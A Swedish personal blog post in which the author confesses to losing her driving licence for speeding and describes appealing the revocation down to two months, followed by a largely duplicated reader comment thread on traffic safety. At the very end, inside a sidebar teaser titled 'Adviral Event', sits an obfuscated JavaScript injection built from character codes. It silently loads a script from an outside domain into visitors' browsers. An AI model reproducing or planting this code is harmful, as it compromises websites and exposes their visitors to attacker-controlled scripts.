Veckans bikt! Nu får jag ta konsekvenserna och acceptera domstolsbeslut!

FullSizeRender 9

 

TREDJE GÅNGEN GILT!!!!

’Hej fina! Detta inlägget tar faktiskt emot att skriva… Det är en personlig bikt. Saken är den att jag har varit av med körkortet TVÅ gånger tidigare, jag VET det är mitt egna fel och jag skyller absolut inte ifrån mig. I höstas var vi nere i Ystad och firade Maggans födelsedag. En lugn och skön helg med då en gravid Maggan.

När jag skulle köra hem därifrån satt jag i min egna lilla värld. Tänkte, funderade och lyssnade på musik. Jag kör ca 6000mil om året, så det är lite ”terapi” för mig att köra bil. Men då från ingenstans så blixtrade det till! FAN, tänkte jag Inte igen!!! Saken är den att jag var så arg på mig själv att jag inte kan beskriva det med ord. jag höll tyst om detta och inväntade pappret. Detta var på landsväg där hastigheten gick ner ett par hundra meter… men jag bromsade alltså inte ner i takt med att hastigheten sänktes. SUCK!

hänt i veckan, hänt.se, my martens, ensam mamma söker, my martens bukplastik, my martens körkort.

Veckorna gick. Jag började hoppas att inget skulle komma. Man vet ju inte riktigt med dessa kameror. MEN brevet kom. ”BARA” böter, TACK gode GUD för det! Jag betalade in 2500kr och var så sjukt glad…

Sen efter ett par månader som först (????) så kom nästa brev, där man rubricerade det med ÅTERKALLAT körkort! SHIT!  HUR LÖSER JAG DETTA!?! Butiken på öland, Jag hade nu hunnit flytta upp till Sigtuna ( norr om Stockholm) Fan, detta är inte sant.

Jag som i falsk trygghet trodde jag var safe. Jag överklagade detta, skriftligt och muntligt. Jag förklarade hur beroende jag var i min situation med pendlingen vid hämtning/lämning Öland. bla. Men även beroende i mitt jobb. Men då jag tidigare pinsamt nog har många fortkörningar och indraget körkort TVÅ gånger så blev det ändå återkallat. MEN, jag fick ner beslutet från ett år till två månader! -Sjukt tacksam över detta!

För hur mycket jag än vrider och vänder på detta så är det helt och hållet mitt egna fel!

En utav mina grundfilosofien i livet, både vad det gäller business, kärlek, relationer m.m. så är det att ett misstag, en gång är helt okay (man lär sig utav det och tar med sig det som en erfarenhet) Men att göra om SAMMA misstag TVÅ gånger det gör INTE jag!!!

hmpf! Men vad det gäller körkortsfrågor och bilkörande så lever jag inte som jag lär! Sjukt pinsamt! Men jag har lovat dig en ärlig blogg, hittills så har jag levt upp till det!

Idag har expressen, AB och skvaller press ringt! Jag antar att det är därför. Det är ju en offentlig handling… Jag har dock varit bussy med inlämning utav Trendspanings nummer och telefon möten, så jag har inte hunnit med ätts vara på detta än. Men va f*n, nu verkar ju alla veta om det och att ljuga har aldrig varit min grej!

-Yes, jag är skyldig!

Det ställer till det rejält! Jag går och går och går mellan alla mina möten inne i stan, förra veckan fick jag stora skavsår! *fniss! Men det är ju hallfall en bonus att förutom min vanliga strypek/löpträning så får jag nu sjukt mycket mer vardags motion.  Det gäller att alltid se det positiva i alla situationer 😉 Beach 2016, jag kommer att vara i sjukt bra form! hehe!

Min fantastiska pappa, har agerat chaufför och hjälpt mig skjutsa Lilleman fram och tillbaka mellan Öland/Sigtuna. Också en bonus, dom får kvalitetstid och jag får hänga lite med pappa <3

Nu är det knappt en månad kvar innan jag får tillbaka kortet. Fram tills dessa så fortsätter jag motionera, lifta med andra och kommer att få lägga en förmögenheten på flygbiljetter till mig och Lilleman. Jag tänker inte skriva att jag ”lovar” att detta inte händer igen. Jag säger däremot att jag ska anstränga mig maximalt och verkligen göra mitt BÄSTA för att aldrig någonsin mer sätta mig själv eller mina nära och kära som i denna situationen igen! Ja, det var veckans bikt!

Kram & hej! / My Martens 

54 Komentarer

 1. Usch va surt, speciellt när du är så beroende av ditt körkort. Kan du inte skaffa en Gps, vet inte om det heter så…men att en tant säger hastigheterna. Tråkigt kanske att lyssna på, men du blir ju påmind. Du får ju, som du skriver motion med detta.

  • Jag kommer definitivt att göra det! OCH börja använda farthållare… hade ingen sån i skåpbilen som jag körde då. Ja, många kommer irritera sig över detta. Men jag är mänsklig, precis som alla andra =)

   • Hej My jag vet hur det känns att bli av med körkortet ,jag har själv varit av med det i två månader för ca 12 årsen.Men du är söt på din oj oj oj bild.

   • Ja, visst är du mänsklig. Sen kan jag tycka att det är ju inget allvarligt som har hänt typ rattonykterhet, utan ”bara” fortkörning. Skvallerblaskorna blir väl glada, så dom har nåt att skriva om ?

 2. Men My då..galning där.Du kanske skulle börja köra rally istället ..hahahahahahaha .
  Hoppas detta får dig att inte trampa så hårt på gasen fortsättningsvis .Kram på dig

 3. Nu blev det jobbigt för dig eftersom skvallerpressen har fått nys om detta, bättre att erkänna att så är fallet, tror inte att du hade gjort det annars, eller…. Det är lätt hänt att gasa på utan att vara medveten om det, sällan man blir bötfälld;)) Ha de bra. Kram

 4. Oj, 12 månader. Vad bra att du lyckades pruta ned det till 2. Jag håller med Lena. Skaffa en GPS och lägg in sedan ett program som varnar för fartkamerorna. Det går att tanka ned fr nätet.

 5. Hej. Jag reagerar ganska negativt på kommentarerna som om det är lustigt att du kör så fort att du förlorar ditt körkort. Ska jag vara ärlig så tycker jag inte i heller att det är rätt att försöka få ner tiden för att få det indraget på grund av att du är beroende av körkortet i jobbet osv. Det bör du tänka på när du kör. Vi är många i trafiken och vi är beroende av att ALLA förare gör sitt bästa med att följa reglerna när vi kör. Jag är medveten om att det finns de förare som kör alkohol och drogpåverkade och dessa är naturligt ännu större fara i trafiken. Tänk om någon i din familj förolyckas på grund av att någon inte följer de trafikregler som vi har. Det hade nog inte varit så lustigt och det händer dagligen någon. Hastighetsreglerna finns av någon anledning och inte för att göra livet surt för oss. Detta blev tyvärr ett surt inlägg men som sagt så reagerade jag mest på att folk tycker det är lustigt.

  • Lagar är till för att följas. precis som jag skriver så VET jag det. jag kör lika mycket som en yrkeschaufför och har tabbat mig flera gånger, vilket jag också erkänner och står för. Eller? Däremot så finns det också en lag som ger den åtalade möjlighet till yttrande, vilket jag alltså gjorde. Denna lagen tog jag till vara på, gjorde min överklagan, och mitt yttrande…. tog emot det nya beslutet och har alltså gjort allting efter konstens alla regler =) Sen måste man nog kunna ha lite ironi, och självdistans i en såshär situation. UTAN att jag på något sätt ursäktar mig, skyller ifrån mig eller inte står för mitt misstag! =) ha en skön kväll!

 6. Usch va surt, speciellt när du är så beroende av ditt körkort. Kan du inte skaffa en Gps, vet inte om det heter så…men att en tant säger hastigheterna. Tråkigt kanske att lyssna på, men du blir ju påmind. Du får ju, som du skriver motion med detta.

  • Jag kommer definitivt att göra det! OCH börja använda farthållare… hade ingen sån i skåpbilen som jag körde då. Ja, många kommer irritera sig över detta. Men jag är mänsklig, precis som alla andra =)

   • Hej My jag vet hur det känns att bli av med körkortet ,jag har själv varit av med det i två månader för ca 12 årsen.Men du är söt på din oj oj oj bild.

   • Ja, visst är du mänsklig. Sen kan jag tycka att det är ju inget allvarligt som har hänt typ rattonykterhet, utan ”bara” fortkörning. Skvallerblaskorna blir väl glada, så dom har nåt att skriva om 🙂

 7. Håller med dig Anna, men stryker man inte medhårs så blir kommentaren dissad, tyvärr! Regler är faktiskt till för att följas och ska gälla alla, ingen ska komma undan, har man gjort fel så har man oavsett undanflykter. Min åsikt och den står jag för. Så är det My, rätta mig om jag har fel;) Ha de!

  • Om du läser vad JAG skriver så är det ju precis samma sak som du skriver ? Eller? Man blir aldrig dissad för sin åsikt. Näthat och personangrepp dissar jag däremot. Två HELT skilda saker! =)

 8. Men My då..galning där.Du kanske skulle börja köra rally istället ..hahahahahahaha .
  Hoppas detta får dig att inte trampa så hårt på gasen fortsättningsvis .Kram på dig

 9. Nu blev det jobbigt för dig eftersom skvallerpressen har fått nys om detta, bättre att erkänna att så är fallet, tror inte att du hade gjort det annars, eller…. Det är lätt hänt att gasa på utan att vara medveten om det, sällan man blir bötfälld;)) Ha de bra. Kram

 10. Oj, 12 månader. Vad bra att du lyckades pruta ned det till 2. Jag håller med Lena. Skaffa en GPS och lägg in sedan ett program som varnar för fartkamerorna. Det går att tanka ned fr nätet.

 11. Hej. Jag reagerar ganska negativt på kommentarerna som om det är lustigt att du kör så fort att du förlorar ditt körkort. Ska jag vara ärlig så tycker jag inte i heller att det är rätt att försöka få ner tiden för att få det indraget på grund av att du är beroende av körkortet i jobbet osv. Det bör du tänka på när du kör. Vi är många i trafiken och vi är beroende av att ALLA förare gör sitt bästa med att följa reglerna när vi kör. Jag är medveten om att det finns de förare som kör alkohol och drogpåverkade och dessa är naturligt ännu större fara i trafiken. Tänk om någon i din familj förolyckas på grund av att någon inte följer de trafikregler som vi har. Det hade nog inte varit så lustigt och det händer dagligen någon. Hastighetsreglerna finns av någon anledning och inte för att göra livet surt för oss. Detta blev tyvärr ett surt inlägg men som sagt så reagerade jag mest på att folk tycker det är lustigt.

  • Lagar är till för att följas. precis som jag skriver så VET jag det. jag kör lika mycket som en yrkeschaufför och har tabbat mig flera gånger, vilket jag också erkänner och står för. Eller? Däremot så finns det också en lag som ger den åtalade möjlighet till yttrande, vilket jag alltså gjorde. Denna lagen tog jag till vara på, gjorde min överklagan, och mitt yttrande…. tog emot det nya beslutet och har alltså gjort allting efter konstens alla regler =) Sen måste man nog kunna ha lite ironi, och självdistans i en såshär situation. UTAN att jag på något sätt ursäktar mig, skyller ifrån mig eller inte står för mitt misstag! =) ha en skön kväll!

 12. Håller med dig Anna, men stryker man inte medhårs så blir kommentaren dissad, tyvärr! Regler är faktiskt till för att följas och ska gälla alla, ingen ska komma undan, har man gjort fel så har man oavsett undanflykter. Min åsikt och den står jag för. Så är det My, rätta mig om jag har fel;) Ha de!

  • Om du läser vad JAG skriver så är det ju precis samma sak som du skriver 😉 Eller? Man blir aldrig dissad för sin åsikt. Näthat och personangrepp dissar jag däremot. Två HELT skilda saker! =)

 13. Jag ser tyvärr inte heller det ”roliga” el ”lustiga” i det hela… Tycker det är rätt oansvarigt (då menar jag alla som begår samma trafikbrott) att nonchalera trafikregler… Nåt värre än bara böter skulle kunna hända o blir någon annan drabbad kan det nog bli svårt att leva med för alla inblandade. Jag blev påkörd med ena sonen med i bilen för att den andra bilen körde för fort o hann inte reagera på högerregeln… Bilen blev mos o både jag o min tonåring ordentligt chockade.

  • Jag har själv varit med om två kraftiga trafikolyckor. En resulterade i en dödsolycka. Det var inte mitt fel, föraren var en flerbarnspappa i medelåldern, han hade fått en stroke och rammade ner 9 bilar. (Inkl min som smälldes först) min bil snurrade flera varv, stannade tillslut av på kanten, med bakhjulen hängandes fritt mot avgrunden….. Allting gick bra gör min del. Lilleman satt inte med i bilen. Men polisen pratade med mig länge i ambulansens tack vare mitt extremt proffesionella handlande i denna panik-situation och mitt sätt att återta kontrollen över bilen så klarade jag mig. Alla olyckor är individuella såklart, jag kör som sagt över 6000mil om året. Jag säger inte att man ska köra för fort, hastighetsgränserna finns där av en anledning. MEN när man som jag kör så otroligt mycket bil, så löper jag högre risk att hamna i olycka tex. Mina fortkörningar har varit i dessa ”klassiska” situationer. Landsväg, ingentrafik tiiidig morgon hastigheten ligger på 90km går under en kort sträcka, ca 300m ner till 70km, där missar jag att bromsa in och pang så blixtrar det till och kortet ryker. Jag säger INTE att det är rätt, men jag vill förtydliga att mitt körsätt INTE skulle bidra till att jag ”rammar ner någon” elle skadar någon pga utav hur jag kör ? däremot så ska jag vanen mig köra mig att hålla hastigheten även indessa situationer! För det är sjukt jobbigt utan körkort ? ha en fin dag!

 14. Jag ser tyvärr inte heller det ”roliga” el ”lustiga” i det hela… Tycker det är rätt oansvarigt (då menar jag alla som begår samma trafikbrott) att nonchalera trafikregler… Nåt värre än bara böter skulle kunna hända o blir någon annan drabbad kan det nog bli svårt att leva med för alla inblandade. Jag blev påkörd med ena sonen med i bilen för att den andra bilen körde för fort o hann inte reagera på högerregeln… Bilen blev mos o både jag o min tonåring ordentligt chockade.

  • Jag har själv varit med om två kraftiga trafikolyckor. En resulterade i en dödsolycka. Det var inte mitt fel, föraren var en flerbarnspappa i medelåldern, han hade fått en stroke och rammade ner 9 bilar. (Inkl min som smälldes först) min bil snurrade flera varv, stannade tillslut av på kanten, med bakhjulen hängandes fritt mot avgrunden….. Allting gick bra gör min del. Lilleman satt inte med i bilen. Men polisen pratade med mig länge i ambulansens tack vare mitt extremt proffesionella handlande i denna panik-situation och mitt sätt att återta kontrollen över bilen så klarade jag mig. Alla olyckor är individuella såklart, jag kör som sagt över 6000mil om året. Jag säger inte att man ska köra för fort, hastighetsgränserna finns där av en anledning. MEN när man som jag kör så otroligt mycket bil, så löper jag högre risk att hamna i olycka tex. Mina fortkörningar har varit i dessa ”klassiska” situationer. Landsväg, ingentrafik tiiidig morgon hastigheten ligger på 90km går under en kort sträcka, ca 300m ner till 70km, där missar jag att bromsa in och pang så blixtrar det till och kortet ryker. Jag säger INTE att det är rätt, men jag vill förtydliga att mitt körsätt INTE skulle bidra till att jag ”rammar ner någon” elle skadar någon pga utav hur jag kör 🙂 däremot så ska jag vanen mig köra mig att hålla hastigheten även indessa situationer! För det är sjukt jobbigt utan körkort 😉 ha en fin dag!

 15. Usch vad tråkigt men vet hur lätt det är har själv varit av med mitt några gånger lyckades dock inte få ner tiden utan var av med det i 8 månader. Sjukt jobbigt när man ska få i hopa vardagsbestyren och man lovar sig själv det ska inte hända igen men tyvärr är det svårt att hålla igen .

 16. Usch vad tråkigt men vet hur lätt det är har själv varit av med mitt några gånger lyckades dock inte få ner tiden utan var av med det i 8 månader. Sjukt jobbigt när man ska få i hopa vardagsbestyren och man lovar sig själv det ska inte hända igen men tyvärr är det svårt att hålla igen .

 17. Anade det…lätt hänt men lagar o regler är till för att följas ? Självklart ingen annans fel hehe men klart trist o besvärligare utan körkort men dina jobb kan du ju sköta ändå, o ska du på möten så finns tåg, buss, tb..o att promenera är ju bara bra ? Ni skulle ju ändå börja flygpendla har du förr skrivit om…snäll pappa du har! Och all publicitet är ju bra publicitet ? Superbra ju att få ner det från 12 till 2 månader, grattis till det!

   • Nej! Flygpenningen är för att spara tid! Sjukt effektivt, 35 min morgon flight, super trevlig personal och kaffe serverat. 45min hem. MYCKET bättre än min körning. Men min flytt upp från Öland har varit långdragen, jag har kört upp grejer i min skåpbil nästan varje vecka…. därför har vi kört =)

 18. Anade det…lätt hänt men lagar o regler är till för att följas 😉 Självklart ingen annans fel hehe men klart trist o besvärligare utan körkort men dina jobb kan du ju sköta ändå, o ska du på möten så finns tåg, buss, tb..o att promenera är ju bara bra 😉 Ni skulle ju ändå börja flygpendla har du förr skrivit om…snäll pappa du har! Och all publicitet är ju bra publicitet 😉 Superbra ju att få ner det från 12 till 2 månader, grattis till det!

   • Nej! Flygpenningen är för att spara tid! Sjukt effektivt, 35 min morgon flight, super trevlig personal och kaffe serverat. 45min hem. MYCKET bättre än min körning. Men min flytt upp från Öland har varit långdragen, jag har kört upp grejer i min skåpbil nästan varje vecka…. därför har vi kört =)

 19. På tal om fortkörningsdiskussionen. Har aldrig fått böter under hela min bilkörningstid och det är många år det. Vad damp ner i min brevlåda idag om inte ett foto på mig och en boot på 1.500:( 86km där det var 80km, dyra km men fotot var bra;) men kanske inte värt pengarna. Bara att erkänna och betala, det och efterskatten på 3000:- Kram

 20. På tal om fortkörningsdiskussionen. Har aldrig fått böter under hela min bilkörningstid och det är många år det. Vad damp ner i min brevlåda idag om inte ett foto på mig och en boot på 1.500:( 86km där det var 80km, dyra km men fotot var bra;) men kanske inte värt pengarna. Bara att erkänna och betala, det och efterskatten på 3000:- Kram

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/